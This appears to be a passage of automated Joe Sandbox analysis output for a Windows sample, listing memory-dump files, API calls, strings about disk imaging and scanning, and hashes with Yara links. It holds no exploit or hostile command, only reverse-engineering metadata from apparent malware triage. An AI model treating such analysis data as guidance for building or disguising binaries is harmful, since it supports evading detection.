Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: File$Pathlstrcat$ByteCharCreateErrorExistsLastMultiSpecWidelstrcpylstrlen
String ID: .eml$Mail (%d).eml
API String ID: 1595888701-517116800
Opcode ID: 52b1e20104f3377dc91fec8c027b994f4485b621f0e094533f5ea76f5a59c3c8
Instruction ID: 2d31145ee77bd0ac8df0534a1926452519440d403ab02d5f3956ea56d5aa0726
Opcode Fuzzy Hash: 52b1e20104f3377dc91fec8c027b994f4485b621f0e094533f5ea76f5a59c3c8
Instruction Fuzzy Hash: 1AA10774A082189FDB24DF64CC44EE9B3F4BF48701F0085E9E98996281DEB56AC6CFD5

Function 00424703 Relevance: 26.0, APIs: 17, Instructions: 453windowkeyboardCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 00424758
IsWindowEnabled.USER32(?), ref: 004247B4
__EH_prolog3_catch.LIBCMT ref: 00424802
GetFocus.USER32 ref: 00424822
GetParent.USER32(?), ref: 0042486D
GetParent.USER32(?), ref: 0042487D
GetKeyState.USER32(00000012), ref: 0042493B
IsDialogMessageW.USER32(?,?), ref: 004249F0
GetFocus.USER32 ref: 00424A03
GetFocus.USER32 ref: 00424A10
IsWindow.USER32(?), ref: 00424A28
GetFocus.USER32 ref: 00424A34
IsWindow.USER32(?), ref: 00424A4A
GetFocus.USER32 ref: 00424A50
GetKeyState.USER32(00000010), ref: 00424A79
MessageBeep.USER32(00000000), ref: 00424B70

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
String ID:
API String ID: 656273425-0
Opcode ID: 269f4cdf1538cd906d59c6d481e7da54541a884959a8be32e7e7716a9fedc402
Instruction ID: 482bc6574aee9c34d5183bc4979b7fbbd663f6a77c29d945f265c67d11bc47f5
Opcode Fuzzy Hash: 269f4cdf1538cd906d59c6d481e7da54541a884959a8be32e7e7716a9fedc402
Instruction Fuzzy Hash: 10F1AE35B00235DBCF20AF66E844BAF7BA5EFC4344F94402BE815A7261DB78DD81CA59

Function 0041016F Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 175windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004136CF: GetWindowLongW.USER32(?,000000F0), ref: 004136DA

GetParent.USER32(?), ref: 0041019E
SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 004101C1
GetWindowRect.USER32(?,?), ref: 004101DB
GetWindowLongW.USER32(00000000,000000F0), ref: 004101F1
CopyRect.USER32(?,?), ref: 0041023E
CopyRect.USER32(?,?), ref: 00410248
GetWindowRect.USER32(00000000,?), ref: 00410251

Part of subcall function 0040E2BF: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 0040E2FF

CopyRect.USER32(?,?), ref: 0041026D

Strings

(, xrefs: 00410207

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Rect$Window$Copy$Long$ByteCharMessageMultiParentSendWide
String ID: (
API String ID: 1385303425-3887548279
Opcode ID: faeec738a7095bfbfcbe4d473ed0c3407d34d3b2fce1bf4ce8b04e9ee141e218
Instruction ID: 41171cc7c5a2743251e6b1dd04b9418392d16e3b5312e2f6da49cea632eb508d
Opcode Fuzzy Hash: faeec738a7095bfbfcbe4d473ed0c3407d34d3b2fce1bf4ce8b04e9ee141e218
Instruction Fuzzy Hash: BF51A572900118AFCB00DBA9CD49EEEBBB9BF48314F154169F505F3294E774ED818B58

Function 0044AE40 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 66COMMON

Download Yara Rule

APIs

OpenEventW.KERNEL32(001F0003,00000000,PauseImaging), ref: 0044AE55
SetEvent.KERNEL32(00000000), ref: 0044AE6C
ResetEvent.KERNEL32(00000000), ref: 0044AEAF
CloseHandle.KERNEL32(00000000), ref: 0044AEB9
OpenEventW.KERNEL32(001F0003,00000000,StopImaging), ref: 0044AED1
SetEvent.KERNEL32(00000000), ref: 0044AEE4
CloseHandle.KERNEL32(00000000), ref: 0044AEEE
CloseHandle.KERNEL32(?), ref: 0044AF05

Strings

PauseImaging, xrefs: 0044AE49
Are you sure you want to cancel the image restoring?If you cancel you will no longer be able to access it until formated again., xrefs: 0044AE9B
Are you sure you want to cancel the image creation?, xrefs: 0044AE82
Warning!, xrefs: 0044AE96
StopImaging, xrefs: 0044AEC5
Warning!, xrefs: 0044AE7D

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Event$CloseHandle$Open$Reset
String ID: Are you sure you want to cancel the image creation?$Are you sure you want to cancel the image restoring?If you cancel you will no longer be able to access it until formated again.$PauseImaging$StopImaging$Warning!$Warning!
API String ID: 801807112-1601283158
Opcode ID: 7f29c28fd3d1a16425fc0ef784c3b40a6779fc60f95b9f378c728f3582bf8c0f
Instruction ID: 4ef789a2026870c2532a25715ed6e5ef0a152d6ba6b5db5aeab2fb0b1c946cd4
Opcode Fuzzy Hash: 7f29c28fd3d1a16425fc0ef784c3b40a6779fc60f95b9f378c728f3582bf8c0f
Instruction Fuzzy Hash: 60216B38A80208EFD704EFA1CD89BAE77B5FB48705F2088A9F515673D0DBB85941CB49

Function 00468230 Relevance: 21.2, APIs: 14, Instructions: 176COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(24000003), ref: 0046825C
SetLastError.KERNEL32(24000004), ref: 0046828E

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 2d82a025e2757f5366c25483701a1336c5164f6c5fdc91229bfd177427396993
Instruction ID: ce95a623c8f7d55c60f476a14aa06ff32b380453c8cd1271f0910ce1d99b496a
Opcode Fuzzy Hash: 2d82a025e2757f5366c25483701a1336c5164f6c5fdc91229bfd177427396993
Instruction Fuzzy Hash: 6B812978A01219EFCB14DF54D898F9AB7B5FF48304F208599E915AB340EB34EA81CF56

Function 004504E0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 98fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 0045050C
SetFilePointer.KERNEL32(000000FF,00000007,00000000,00000000), ref: 00450531
CloseHandle.KERNEL32(000000FF), ref: 00450540

Strings

, xrefs: 00450579

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: File$CloseCreateHandlePointer
String ID:
API String ID: 22866420-2720604516
Opcode ID: f3c7546fadf72da080c6a319df059df9c09745840a30f99038a511dd3ff8fa2b
Instruction ID: 9de3d00d70d50ef2c5992ad5e252fdbd0f1a27553e652e4481cfbb8697dea904
Opcode Fuzzy Hash: f3c7546fadf72da080c6a319df059df9c09745840a30f99038a511dd3ff8fa2b
Instruction Fuzzy Hash: 81319878A00208FBEB10DBA4DC49FAF7BB4AB04705F104559FA15A72C1F778AA45CF59

Function 0044F1B0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 75synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?), ref: 0044F1BF
ResetEvent.KERNEL32(?), ref: 0044F1E3
SetEvent.KERNEL32(?), ref: 0044F1FB
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0044F244
ShowWindow.USER32(?,00000005,00000000), ref: 0044F2DC

Strings

h#I, xrefs: 0044F2AE
Are your sure you want to cancel the scan?, xrefs: 0044F1CC
Warning!, xrefs: 0044F1C7

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
